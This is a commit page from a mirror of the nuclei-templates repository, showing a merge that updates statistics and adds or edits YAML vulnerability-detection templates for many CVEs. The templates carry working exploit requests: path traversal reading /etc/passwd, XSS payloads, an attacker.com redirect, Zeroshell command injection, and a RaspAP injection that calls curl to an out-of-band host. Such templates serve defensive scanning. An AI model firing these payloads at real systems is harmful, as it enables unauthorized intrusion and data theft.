daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master'

patch-1
GwanYeong Kim 2022-03-15 19:03:01 +09:00
parent 5022e4c931 50265c326c
commit b08641a3ab
158 changed files with 3307 additions and 4814 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3101
.new-additions
View File

File diff suppressed because it is too large Load Diff

20
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
| cve | 1056 | daffainfo | 544 | cves | 1061 | info | 1067 | http | 2905 |
| panel | 446 | dhiyaneshdk | 406 | exposed-panels | 447 | high | 789 | file | 57 |
| lfi | 430 | pikpikcu | 313 | vulnerabilities | 421 | medium | 622 | network | 49 |
| xss | 335 | pdteam | 257 | technologies | 227 | critical | 384 | dns | 17 |
| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 169 | | |
| exposure | 282 | dwisiswant0 | 163 | misconfiguration | 188 | unknown | 6 | | |
| rce | 268 | 0x_akoko | 114 | workflows | 185 | | | | |
| cve2021 | 251 | gy741 | 109 | token-spray | 147 | | | | |
| tech | 238 | princechaddha | 109 | default-logins | 77 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
**222 directories, 3221 files**.
**225 directories, 3247 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

2675
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

18
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
| cve | 1056 | daffainfo | 544 | cves | 1061 | info | 1067 | http | 2905 |
| panel | 446 | dhiyaneshdk | 406 | exposed-panels | 447 | high | 789 | file | 57 |
| lfi | 430 | pikpikcu | 313 | vulnerabilities | 421 | medium | 622 | network | 49 |
| xss | 335 | pdteam | 257 | technologies | 227 | critical | 384 | dns | 17 |
| wordpress | 329 | geeknik | 174 | exposures | 199 | low | 169 | | |
| exposure | 282 | dwisiswant0 | 163 | misconfiguration | 188 | unknown | 6 | | |
| rce | 268 | 0x_akoko | 114 | workflows | 185 | | | | |
| cve2021 | 251 | gy741 | 109 | token-spray | 147 | | | | |
| tech | 238 | princechaddha | 109 | default-logins | 77 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |

6
cves/2010/CVE-2010-1540.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1540
info:
name: Joomla! Component com_blog - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
remediation: Upgrade to a supported version.
reference: |
- https://www.exploit-db.com/exploits/11625
- https://www.cvedetails.com/cve/CVE-2010-1540
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1540
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/06

6
cves/2010/CVE-2010-1601.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1601
info:
name: Joomla! Component JA Comment - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12236
- https://www.cvedetails.com/cve/CVE-2010-1601
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1601
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/06

3
cves/2010/CVE-2010-1602.yaml
View File

@ -5,7 +5,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12283
- https://www.cvedetails.com/cve/CVE-2010-1602
@ -26,4 +25,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/07

3
cves/2010/CVE-2010-1607.yaml
View File

@ -5,7 +5,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12316
- https://www.cvedetails.com/cve/CVE-2010-1607
@ -26,4 +25,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/07

6
cves/2010/CVE-2010-1715.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1715
info:
name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12174
- https://www.cvedetails.com/cve/CVE-2010-1715
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1715
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/10

31
cves/2017/CVE-2017-9833.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2017-9833
info:
name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges
author: 0x_Akoko
severity: high
description: The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials.
reference:
- https://www.exploit-db.com/exploits/42290
- https://www.cvedetails.com/cve/CVE-2017-9833
tags: boa,lfr,lfi,cve,cve2017
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2017-9833
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

37
cves/2018/CVE-2018-12296.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2018-12296
info:
name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure
author: princechaddha
severity: high
description: Insufficient access control in /api/external/7.0/system.System.get_infos in Seagate NAS OS version 4.3.15.1 allows attackers to obtain information about the NAS without authentication via empty POST requests.
reference:
- https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
- https://nvd.nist.gov/vuln/detail/CVE-2018-12296
tags: cve,cve2018,seagate,nasos,disclosure,unauth
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2018-12296
cwe-id: CWE-732
requests:
- raw:
- |
POST /api/external/7.0/system.System.get_infos HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
matchers:
- type: word
part: body
words:
- '"version":'
- '"serial_number":'
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '"version": "([0-9.]+)"'

28
cves/2018/CVE-2018-12300.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2018-12300
info:
name: Seagate NAS OS 4.3.15.1 - Open redirect
author: 0x_Akoko
severity: medium
description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter.
reference:
- https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
- https://www.cvedetails.com/cve/CVE-2018-12300
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2018-12300
cwe-id: CWE-601
tags: cve,cve2018,redirect,seagate,nasos
requests:
- method: GET
path:
- '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

9
cves/2019/CVE-2019-12725.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2019-12725
info:
name: Zeroshell 3.9.0 Remote Command Execution
author: dwisiswant0
author: dwisiswant0,akincibor
severity: critical
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
@ -20,14 +20,17 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27"
- "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+"
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/04

31
cves/2020/CVE-2020-13158.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2020-13158
info:
name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal
author: 0x_Akoko
severity: high
description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.
reference:
- https://github.com/InfoSec4Fun/CVE-2020-13158
- https://sourceforge.net/projects/artica-squid/files/
- https://nvd.nist.gov/vuln/detail/CVE-2020-13158
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-13158
cwe-id: CWE-22
tags: cve,cve2020,artica,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

30
cves/2020/CVE-2020-15050.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-15050
info:
name: Suprema BioStar2 - Local File Inclusion (LFI)
author: gy741
severity: high
description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
reference:
- http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
- https://www.supremainc.com/en/support/biostar-2-pakage.asp
- https://nvd.nist.gov/vuln/detail/CVE-2020-15050
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.50
cve-id: CVE-2020-15050
tags: cve,cve2020,lfi,suprema,biostar2
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and

38
cves/2020/CVE-2020-7943.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2020-7943
info:
name: Puppet Server and PuppetDB sensitive information disclosure
severity: high
author: c-sh0
description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information
reference:
- https://puppet.com/security/cve/CVE-2020-7943
- https://nvd.nist.gov/vuln/detail/CVE-2020-7943
- https://tickets.puppetlabs.com/browse/PDB-4876
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-7943
cwe-id: CWE-276
tags: cve,cve2020,puppet,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/metrics/v1/mbeans"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/json"
- type: word
part: body
words:
- "trapperkeeper"

43
cves/2021/CVE-2021-3002.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2021-3002
info:
name: Seo Panel 4.8.0 - Post based Reflected XSS
author: edoardottt
severity: medium
description: Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-3002
cwe-id: CWE-79
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3002
- http://www.cinquino.eu/SeoPanelReflect.htm
tags: cve,cve2021,seopanel,xss
requests:
- raw:
- |
POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "<img src=a onerror=alert(document.domain)>"
- "seopanel"
condition: and

10
cves/2021/CVE-2021-33357.yaml
View File

@ -4,13 +4,14 @@ info:
name: RaspAP <= 2.6.5 - Remote Code Execution
author: pikpikcu,pdteam
severity: critical
description: |
RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.
tags: cve,cve2021,rce,raspap,oast
reference:
- https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/
- https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf
- https://nvd.nist.gov/vuln/detail/CVE-2021-33357
- https://github.com/RaspAP/raspap-webgui
description: RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.
tags: cve,cve2021,rce,raspap,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
@ -22,12 +23,17 @@ requests:
path:
- "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
words:
- "DHCPEnabled"
extractors:
- type: regex
part: interactsh_request

7
cves/2021/CVE-2021-3654.yaml
View File

@ -3,12 +3,17 @@ id: CVE-2021-3654
info:
name: noVNC Open Redirect
author: geeknik
severity: low
severity: medium
description: A user-controlled input redirects noVNC users to an external website.
reference:
- https://seclists.org/oss-sec/2021/q3/188
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
tags: redirect,novnc,cve,cve2021
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-3654
cwe-id: CWE-601
requests:
- method: GET

7
cves/2021/CVE-2021-40868.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2021-40868
info:
name: Cloudron 6.2 Cross Site Scripting
name: Cloudron 6.2 Cross-Site Scripting
author: daffainfo
severity: medium
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS.
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.
remediation: Upgrade to Cloudron 6.3 or higher.
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
@ -35,3 +36,5 @@ requests:
words:
- '</script><script>alert(document.domain)</script>'
part: body
# Enhanced by mp on 2022/03/06

7
cves/2021/CVE-2021-40870.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2021-40870
info:
name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE
name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution
author: pikpikcu
severity: critical
description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.
reference:
- https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021
- https://wearetradecraft.com/advisories/tc-2021-0002/
- https://nvd.nist.gov/vuln/detail/CVE-2021-40870
tags: cve,cve2021,rce,aviatrix
@ -41,3 +42,5 @@ requests:
- "PHP Extension"
- "PHP Version"
condition: and
# Enhanced by mp on 2022/03/06

14
cves/2021/CVE-2021-40875.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2021-40875
info:
name: Gurock TestRail Application files.md5 exposure
name: Gurock TestRail Application files.md5 Exposure
author: oscarintherocks
severity: medium
description: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
tags: cve,cve2021,exposure,gurock,testrail
reference:
https://github.com/SakuraSamuraii/derailed
https://johnjhacking.com/blog/cve-2021-40875/
https://www.gurock.com/testrail/tour/enterprise-edition
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
- htttps://github.com/SakuraSamuraii/derailed
- https://johnjhacking.com/blog/cve-2021-40875/
- https://www.gurock.com/testrail/tour/enterprise-edition
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
classification:
cve-id: CVE-2021-40875
metadata:
@ -34,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/06

2
cves/2021/CVE-2021-40960.yaml
View File

@ -30,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/06

7
cves/2021/CVE-2021-40978.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2021-40978
info:
name: mkdocs 1.2.2 built-in dev-server allows directory traversal
name: MKdocs 1.2.2 Directory Traversal
author: pikpikcu
severity: high
reference:
- https://github.com/mkdocs/mkdocs/pull/2604
- https://github.com/nisdn/CVE-2021-40978
- https://nvd.nist.gov/vuln/detail/CVE-2021-40978
tags: cve,cve2021,mkdocs,lfi
description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1."
description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
@ -31,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/06

5
cves/2021/CVE-2021-41174.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2021-41174
info:
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
author: pdteam
severity: medium
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
remediation: Upgrade to 8.2.3 or higher.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
- https://nvd.nist.gov/vuln/detail/CVE-2021-41174
@ -44,3 +45,5 @@ requests:
group: 1
regex:
- '"subTitle":"Grafana ([a-z0-9.]+)'
# Enhanced by mp on 2022/03/06

5
cves/2021/CVE-2021-41266.yaml
View File

@ -5,7 +5,8 @@ info:
author: alevsk
severity: critical
description: |
Minio console is a graphical user interface for the for MinIO operator. Minio itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. All users on release v0.12.2 and before are affected and are advised to update to 0.12.3 or newer. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.
MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.
remediation: "Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41266
- https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36
@ -44,3 +45,5 @@ requests:
part: header
words:
- "token"
# Enhanced by mp on 2022/03/06

5
cves/2021/CVE-2021-41277.yaml
View File

@ -4,7 +4,8 @@ info:
name: Metabase Local File Inclusion
author: 0x_Akoko
severity: critical
description: Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you&#8217;re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
description: "Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded."
remediation: "This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application."
reference:
- https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
- https://nvd.nist.gov/vuln/detail/CVE-2021-41277
@ -34,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/06

5
cves/2021/CVE-2021-41291.yaml
View File

@ -4,8 +4,9 @@ info:
name: ECOA Building Automation System - Directory Traversal Content Disclosure
author: gy741
severity: high
description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41291
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
- https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
tags: cve,cve2021,ecoa,lfi,traversal
@ -25,3 +26,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/03/06

7
cves/2021/CVE-2021-41293.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2021-41293
info:
name: ECOA Building Automation System - LFD
name: ECOA Building Automation System - Local File Disclosure
author: 0x_Akoko
severity: high
description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41293
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
tags: cve,cve2021,ecoa,lfi,disclosure
@ -33,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/07

7
cves/2021/CVE-2021-41349.yaml
View File

@ -1,12 +1,13 @@
id: CVE-2021-41349
info:
name: Pre-Auth POST Based Reflected XSS in Microsoft Exchange
name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting
author: rootxharsh,iamnoooob
severity: medium
tags: cve,cve2021,xss,microsoft,exchange
description: Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305.
description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
reference:
- https://www.microsoft.com/en-us/download/details.aspx?id=103643
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
- https://nvd.nist.gov/vuln/detail/CVE-2021-41349
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
@ -40,3 +41,5 @@ requests:
- type: status
status:
- 500
# Enhanced by mp on 2022/03/07

4
cves/2021/CVE-2021-41381.yaml
View File

@ -4,7 +4,7 @@ info:
name: Payara Micro Community 5.2021.6 Directory Traversal
author: pikpikcu
severity: medium
description: Payara Micro Community 5.2021.6 and below allows Directory Traversal
description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
reference:
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
- https://nvd.nist.gov/vuln/detail/CVE-2021-41381
@ -28,3 +28,5 @@ requests:
- "payara.security.openid.sessionScopedConfiguration=true"
condition: and
part: body
# Enhanced by mp on 2022/03/07

8
cves/2021/CVE-2021-41467.yaml
View File

@ -1,13 +1,13 @@
id: CVE-2021-41467
info:
name: JustWriting - Reflected XSS
name: JustWriting - Reflected Cross-Site Scripting
author: madrobot
severity: medium
description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
reference:
- https://github.com/hjue/JustWriting/issues/106
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467
- https://nvd.nist.gov/vuln/detail/CVE-2021-41467
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -36,3 +36,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/03/07

11
cves/2021/CVE-2021-41648.yaml
View File

@ -1,11 +1,14 @@
id: CVE-2021-41648
info:
